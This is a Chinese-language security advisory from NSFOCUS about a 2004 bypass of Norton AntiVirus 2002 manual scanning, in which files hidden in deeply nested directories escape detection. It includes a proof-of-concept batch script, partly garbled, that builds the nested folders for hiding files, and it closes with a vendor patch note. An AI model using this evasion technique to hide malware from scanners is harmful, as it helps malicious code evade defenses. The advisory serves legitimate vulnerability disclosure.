安全研究
安全漏洞
Symantec Norton AntiVirus 2002文件手工扫描绕过漏洞
发布日期:2004-04-19
更新日期:2004-04-26
受影响系统:
Symantec Norton AntiVirus 2002描述:
- Microsoft Windows XP Professional
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
BUGTRAQ ID: 10164
Symantec Norton AntiVirus 2002是一款防病毒程序。
Symantec Norton AntiVirus 2002在扫描特殊文件名嵌套的文件时存在问题,可导致恶意程序不被扫描到。
把文件存放在多层嵌套的目录中,包含在里面的恶意程序可绕过Norton AntiVirus 2002扫描程序的检测。
<*来源:Bipin Gautam (door_hunt3r@blackcodemail.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=108222209330156&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
@echo off
rem Bipin Gautam [hUNT3R]
rem [http://www.geocities.com/visitbipin] * [http://www.01security.com]
echo ?
echo ************************************************
echo -( For a harmless test... you can use,
echo http://www.eicar.org/anti_virus_test_file.htm )-
echo ************************************************
pause
cdc:
cd:hUNT3r
md 1
cd 1
if not errorlevel 1 goto :hUNT3r
cd..
rmdir 1
md X
cls
echo ***************************************************************
echo Now you can inject any file inside the folder 'X' which is inside
echo 120'th sub-directory of 'c:\1' [ i.e c:\1\..\...\.....[120'th dir].....\X\ ]
echo Note: The file you are moving to'c:\1\...\X\' should only contain
echo '1' char. file name, say: '1.exe' or '2.exe' or 'a.exe' etc...
echo not as '123.not' 'qwert.hak'
echo .........
echo So, ARE YOU DONE!?
echo .........
echo After this batch script is terminated, you'll
echo find the file you ^just copied^ inside c:\1\........\Xecho now in c:\3\3\3\3\3\1\1\1\......[130' th dir].....\Xecho mmm... Then have a manual scan of c:\3\ Any file you
echo have put inside the dir. 'X' can't be detected by NORTON Antivirus anymore!!!
echo ***************************************************
pause
cdmd 3\3\3\3\3\3\3\3\3\3cdxcopy /E /I c:\1\*.* c:3\3\3\3\3\3\3\3\3\3exit
建议:
厂商补丁:
Symantec
--------
目前厂商已经发布了升级补丁以修复这个安全问题,建议用户使用Norton的自动升级更正此问题。
http://www.symantec.com/
浏览次数:3627
严重程度:0(网友投票)
绿盟科技给您安全的保障